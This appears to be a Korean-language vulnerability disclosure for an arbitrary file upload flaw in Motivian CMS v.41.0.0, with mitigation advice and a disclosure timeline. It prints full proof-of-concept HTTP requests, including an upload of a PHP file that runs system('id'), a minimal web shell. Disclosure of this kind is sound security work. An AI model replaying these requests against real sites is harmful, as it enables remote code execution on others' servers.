
이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.
이 저장소는 Motivian Content Management System v.41.0.0에서 발견된 보안 취약점을 공개합니다.
이 취약점은 책임 있는 공개 관행에 따라 벤더와 MITRE에 보고되었으며, MITRE는 임시 CVE ID를 할당했습니다. 45일 공개 기간 만료 후 세부 내용이 공개됩니다.
Content/Gallery/ImagesMotivian Content Management System v.41.0.0의 파일 업로드 취약점으로 인해 원격 공격자가 Content/Gallery/Images 구성 요소를 통해 악성 코드가 포함된 조작된 확장자(예: .php, .png, .txt)의 임의 파일을 업로드할 수 있습니다.
이 취약점은 다양한 확장자의 파일을 업로드하여 악용될 수 있습니다. 시연 목적으로 두 가지 개념 증명 사례가 사용되었습니다. 하나는 악성 코드가 포함된 .php 파일, 다른 하나는 EICAR 테스트 문자열이 포함된 .txt 파일입니다. 두 파일 모두 Content/Gallery/Images 구성 요소를 통해 업로드되었습니다.
아래는 문제를 시연하는 데 사용된 HTTP 요청 및 응답의 전체 기록입니다.
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
사용자가 임의의 파일을 업로드하지 못하도록 합니다. 엄격한 파일 검증(MIME 유형 및 콘텐츠 검사)을 구현하고, 파일 이름을 무작위화하며, 업로드 디렉터리를 제한합니다.
| 날짜 | 조치 |
|---|---|
| 2025-02-06 | CVE ID 요청 (CNA: MITRE) |
| 2025-04-02 | CVE ID 할당 |
| 2025-04-07 | 취약점을 벤더에 보고 |
발견 및 책임 있는 공개:
Francesco Marcuccio
사이버보안 컨설턴트, 침투 테스터
MITRE 발견자 기여자로 등록됨:
Francesco Marcuccio
사이버보안 컨설턴트, 침투 테스터
이 CVE ID는 공식적으로 게시(PUBLISHED) 상태입니다. 분석 후 NIST에서 CVSS 점수로 업데이트될 예정입니다.
| 2025-05-31 |
| 45일 공개 기간 만료 후 공개 (총 54일) |
| 2025-06-04 | MITRE 데이터베이스 및 NIST/NVD 포털에 공식 등록 및 입력 |